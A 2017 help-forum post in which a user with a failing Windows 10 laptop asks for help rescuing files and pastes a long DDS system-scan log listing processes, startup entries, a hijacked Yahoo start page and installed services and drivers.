Author Topic: [Resolved] Problems with computer  (Read 1111 times)

mommyto3furballs
« on: April 13, 2017, 03:54:53 PM »
My computer is literally falling apart. I'm trying to get everything off it before I scrap it, but unfortunately something is not allowing me to save my files on DVD-R, on my external hard drive (not recognising it), etc. I have a whole bunch of music on here that I don't want to lose, so I'm getting beyond frustrated. Please help!

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.14393.953
Run by ghy at 17:51:17 on 2017-04-13
Microsoft Windows 10 Home  10.0.14393.0.1252.1.1033.18.3911.1426 [GMT -4:00]
.
AV: Avast Antivirus *Enabled/Updated* {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Avast Antivirus *Enabled/Updated* {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\igfxCUIService.exe
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\dashost.exe
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\Program Files\Elantech\ETDService.exe
C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
C:\Program Files (x86)\Intel Driver Update Utility\SUR\SurSvc.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\system32\sihost.exe
C:\Program Files\Elantech\ETDCtrl.exe
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\System32\RuntimeBroker.exe
C:\WINDOWS\system32\igfxEM.exe
C:\WINDOWS\system32\igfxHK.exe
C:\WINDOWS\system32\igfxTray.exe
C:\Program Files\Elantech\ETDCtrlHelper.exe
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Users\ghy\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\CCleaner\CCleaner64.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\WINDOWS\system32\fontdrvhost.exe
C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeHost.exe
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgentUserBroker.exe
C:\WINDOWS\system32\svchost.exe -k SDRSVC
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8104.42387.0_x64__8wekyb3d8bbwe\HxMail.exe
C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8104.42387.0_x64__8wekyb3d8bbwe\HxTsr.exe
C:\WINDOWS\ImmersiveControlPanel\SystemSettings.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\System32\SystemSettingsBroker.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\AUDIODG.EXE
C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe
C:\Program Files (x86)\ImgBurn\ImgBurn.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\Windows\System32\smartscreen.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0ByB0D0A0DyD0AtCtCyCtN0D0Tzu0StCzytBzztN1L2XzutAtFtBzytFtAtFyDzztN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyBzyyBtDtDyCzytDtGyC0B0AyDtGtAtB0D0AtGyCzytD0EtGtCtDtAtAyC0FyEtCtBtCtDtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0ByEtDyCtD0B0FtGtAzzyE0CtGyEzy0CzztG0ByByB0CtG0Czy0A0CyByE0F0D0DyDzz0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtByCyBtB%26cr%3D266040695%26a%3Dwbf_fs_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
uLocal Page = %11%\blank.htm
mStart Page = hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0ByB0D0A0DyD0AtCtCyCtN0D0Tzu0StCzytBzztN1L2XzutAtFtBzytFtAtFyDzztN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyBzyyBtDtDyCzytDtGyC0B0AyDtGtAtB0D0AtGyCzytD0EtGtCtDtAtAyC0FyEtCtBtCtDtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0ByEtDyCtD0B0FtGtAzzyE0CtGyEzy0CzztG0ByByB0CtG0Czy0A0CyByE0F0D0DyDzz0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtByCyBtB%26cr%3D266040695%26a%3Dwbf_fs_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
uRun: [OneDrive] "C:\Users\ghy\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
uRun: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
uRun: [Chromium] c:\users\ghy\appdata\local\chromium\application\chrome.exe --auto-launch-at-startup --profile-directory=Default --restore-last-session
mRun: [iSkysoft Helper Compact.exe] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
mRun: [DelaypluginInstall] C:\ProgramData\iSkysoft\iTube Studio\DelayPluginI.exe
mExplorerRun: [BtvStack] "C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe"
mPolicies-System: DSCAutomationHostEnabled = dword:2
mPolicies-System: SoftwareSASGeneration = dword:1
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
DPF: {5AE58FCF-6F6A-49B2-B064-02492C66E3F4} - hxxp://catalog.update.microsoft.com/v7/site/ClientControl/en/x86/MuCatalogWebControl.cab?1473953425346
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{27c3b822-5058-4999-ae2f-3aa01a887b39} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{27c3b822-5058-4999-ae2f-3aa01a887b39}\1425259435D203645323 : DHCPNameServer = 216.104.96.22 216.104.98.222
TCP: Interfaces\{27c3b822-5058-4999-ae2f-3aa01a887b39}\2416E646964713 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{27c3b822-5058-4999-ae2f-3aa01a887b39}\4505D2C494E4B4F5645403638314 : DHCPNameServer = 192.168.209.1 192.168.0.1
TCP: Interfaces\{27c3b822-5058-4999-ae2f-3aa01a887b39}\7796768647D616E664333324 : DHCPNameServer = 68.69.147.20 68.69.147.40
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: WSISAllmytubechrome - {4724F5AF-4E6D-41CA - <orphaned>
AppInit_DLLs= C:\PROGRA~2\Sophos\SOPHOS~1\\SOPHOS~1.DLL
SSODL: WebCheck - <orphaned>
LSA: Security Packages =  ""
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-mStart Page = hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0ByB0D0A0DyD0AtCtCyCtN0D0Tzu0StCzytBzztN1L2XzutAtFtBzytFtAtFyDzztN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyBzyyBtDtDyCzytDtGyC0B0AyDtGtAtB0D0AtGyCzytD0EtGtCtDtAtAyC0FyEtCtBtCtDtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0ByEtDyCtD0B0FtGtAzzyE0CtGyEzy0CzztG0ByByB0CtG0Czy0A0CyByE0F0D0DyDzz0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtByCyBtB%26cr%3D266040695%26a%3Dwbf_fs_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
x64-Run: [ETDCtrl] C:\Program Files (x86)\Elantech\ETDCtrl.exe
x64-Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
x64-Run: [AvastUI.exe] "C:\Program Files\AVAST Software\Avast\AvLaunch.exe" /gui
x64-ExplorerRun: [BtvStack] "C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe"
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-mPolicies-System: SoftwareSASGeneration = dword:1
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: WSISAllmytubechrome - {4724F5AF-4E6D-41CA - <orphaned>
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
============= SERVICES / DRIVERS ===============
.
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2016-7-16 48152]
R0 iorate;iorate;C:\WINDOWS\System32\drivers\iorate.sys [2016-11-9 48992]
R0 volume;Volume driver;C:\WINDOWS\System32\drivers\volume.sys [2016-7-16 16224]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2016-7-16 107032]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2016-7-16 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2016-8-23 199008]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2016-10-28 227328]
R1 aswbidsdriver;aswbidsdriver;C:\WINDOWS\System32\drivers\aswbidsdrivera.sys [2017-2-10 307736]
R1 aswKbd;aswKbd;C:\WINDOWS\System32\drivers\aswKbd.sys [2017-1-30 32600]
R1 aswSnx;aswSnx;C:\WINDOWS\System32\drivers\aswSnx.sys [2017-1-30 1005048]
R1 aswSP;aswSP;C:\WINDOWS\System32\drivers\aswSP.sys [2017-1-30 556784]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2016-7-16 88576]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2016-7-16 8192]
R1 SASDIFSV;SASDIFSV;C:\Program Files\SUPERAntiSpyware\sasdifsv64.sys [2011-7-22 14928]
R1 SASKUTIL;SASKUTIL;C:\Program Files\SUPERAntiSpyware\saskutil64.sys [2011-7-12 12368]
R2 !SASCORE;SAS Core Service;C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [2014-7-22 173472]
R2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2017-3-17 83768]
R2 aswMonFlt;aswMonFlt;C:\WINDOWS\System32\drivers\aswMonFlt.sys [2017-1-30 127112]
R2 AtherosSvc;AtherosSvc;C:\Program Files (x86)\Bluetooth Suite\AdminService.exe [2013-9-7 312448]
R2 avast! Antivirus;Avast Antivirus;C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2017-4-4 261712]
R2 CDPSvc;Connected Devices Platform Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R2 CDPUserSvc_20bc5;CDPUserSvc_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 clreg;Virtual Registry for Containers;C:\WINDOWS\System32\drivers\registry.sys [2016-7-16 70144]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2016-7-16 44496]
R2 DiagTrack;Connected User Experiences and Telemetry;C:\WINDOWS\System32\svchost.exe -k utcsvc [2016-7-16 44496]
R2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 ETDService;Elan Service;C:\Program Files\Elantech\ETDService.exe [2015-10-7 144072]
R2 igfxCUIService1.0.0.0;Intel(R) HD Graphics Control Panel Service;C:\WINDOWS\System32\igfxCUIService.exe [2016-5-12 319096]
R2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [2016-3-16 209184]
R2 OneSyncSvc_20bc5;Sync Host_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 ss_conn_service;SAMSUNG Mobile Connectivity Service;C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [2016-8-15 754784]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2016-7-16 78336]
R2 SystemUsageReportSvc_WILLAMETTE;Intel(R) System Usage Report Service SystemUsageReportSvc_WILLAMETTE;C:\Program Files (x86)\Intel Driver Update Utility\SUR\SurSvc.exe [2016-3-9 118424]
R2 tiledatamodelsvc;Tile Data model server;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 wcifs;Windows Container Isolation;C:\WINDOWS\System32\drivers\wcifs.sys [2016-9-29 119648]
R2 wcnfs;Windows Container Name Virtualization;C:\WINDOWS\System32\drivers\wcnfs.sys [2016-7-16 66560]
R2 WpnService;Windows Push Notifications System Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 aswbIDSAgent;aswbIDSAgent;C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2017-4-4 7398336]
R3 b57xdbd;Broadcom xD Picture Bus Driver Service;C:\WINDOWS\System32\drivers\b57xdbd.sys [2013-7-10 72912]
R3 b57xdmp;Broadcom xD Picture vstorp client drv;C:\WINDOWS\System32\drivers\b57xdmp.sys [2013-7-10 25296]
R3 bScsiMSa;bScsiMSa;C:\WINDOWS\System32\drivers\bScsiMSa.sys [2013-7-23 59088]
R3 bScsiSDa;bScsiSDa;C:\WINDOWS\System32\drivers\bScsiSDa.sys [2013-7-19 82128]
R3 BTATH_BUS;Qualcomm Atheros Bluetooth Bus;C:\WINDOWS\System32\drivers\btath_bus.sys [2013-9-7 34384]
R3 ETD;ELAN Input Device;C:\WINDOWS\System32\drivers\ETD.sys [2015-10-7 525512]
R3 IntcDAud;Intel(R) Display Audio;C:\WINDOWS\System32\drivers\IntcDAud.sys [2015-8-21 463112]
R3 Intel(R) Security Assist;Intel(R) Security Assist;C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [2016-3-2 335872]
R3 iwdbus;IWD Bus Enumerator;C:\WINDOWS\System32\drivers\iwdbus.sys [2015-12-1 38896]
R3 k57nd60a;Broadcom NetLink (TM) Gigabit Ethernet - NDIS 6.0;C:\WINDOWS\System32\drivers\k57nd60a.sys [2016-7-16 446464]
R3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [2016-2-24 192216]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2016-7-16 20480]
R3 PimIndexMaintenanceSvc_20bc5;Contact Data_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R3 TimeBrokerSvc;Time Broker;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
R3 UnistoreSvc_20bc5;User Data Storage_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 UserDataSvc_20bc5;User Data Access_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S2 isaHelperSvc;Intel(R) Security Assist Helper;C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [2016-3-2 8704]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService [2016-7-16 44496]
S2 Update service;Update service;C:\Program Files (x86)\Popcorn Time\Updater.exe [2016-12-27 339968]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2016-7-16 18432]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2016-7-16 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2016-7-16 15360]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2016-7-16 44496]
S3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
S3 aswHwid;aswHwid;C:\WINDOWS\System32\drivers\aswHwid.sys [2017-1-30 38296]
S3 bcmfn;bcmfn Service;C:\WINDOWS\System32\drivers\bcmfn.sys [2016-7-16 9728]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2016-7-16 9728]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2016-7-16 44496]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2016-7-16 38912]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2016-10-28 118272]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2016-7-16 346976]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2016-7-16 2104160]
S3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 dg_ssudbus;SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.);C:\WINDOWS\System32\drivers\ssudbus.sys [2016-4-25 130688]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2016-7-16 93184]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 embeddedmode;Embedded Mode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 ESRV_SVC_WILLAMETTE;Energy Server Service WILLAMETTE;C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe [2016-6-19 416408]
S3 FrameServer;Windows Camera Frame Server;C:\WINDOWS\System32\svchost.exe -k Camera [2016-7-16 44496]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2016-7-16 20480]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2016-7-16 50016]
S3 HvHost;HV Host Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2016-7-16 33280]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2016-7-16 81408]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2016-7-16 64512]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2016-7-16 176384]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2016-7-16 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2016-7-16 113152]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2016-7-16 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2016-7-16 526176]
S3 ICCS;Intel(R) Integrated Clock Controller Service - Intel(R) ICCS;C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe [2016-6-19 169752]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2016-7-16 35840]
S3 intaud_WaveExtensible;Intel WiDi Audio Device;C:\WINDOWS\System32\drivers\intelaud.sys [2015-12-1 50160]
S3 Intel(R) Capability Licensing Service TCP IP Interface;Intel(R) Capability Licensing Service TCP IP Interface;C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [2016-2-19 974632]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2016-7-16 105824]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2016-7-16 101216]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2016-10-12 64352]
S3 MessagingService_20bc5;MessagingService_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2016-7-16 842584]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2016-7-16 108896]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library;C:\WINDOWS\System32\drivers\NetAdapterCx.sys [2016-7-16 90624]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2016-7-16 58720]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2016-7-16 61792]
S3 PhoneSvc;Phone Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2016-7-16 928608]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 scmbus;Microsoft Storage Class Memory Bus Driver;C:\WINDOWS\System32\drivers\scmbus.sys [2016-7-16 88416]
S3 scmdisk0101;Microsoft NVDIMM-N disk driver;C:\WINDOWS\System32\drivers\scmdisk0101.sys [2016-7-16 123904]
S3 semav6msr64;semav6msr64;C:\WINDOWS\System32\drivers\semav6msr64.sys [2016-6-19 21984]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2017-3-15 1312768]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2016-7-16 151904]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2016-7-16 44496]
S3 ssudmdm;SAMSUNG  Mobile USB Modem Drivers (DEVGURU Ver.);C:\WINDOWS\System32\drivers\ssudmdm.sys [2016-8-15 164992]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2016-9-29 81760]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2016-7-16 32096]
S3 TieringEngineService;Storage Tiers Management;C:\WINDOWS\System32\TieringEngineService.exe [2016-7-16 287744]
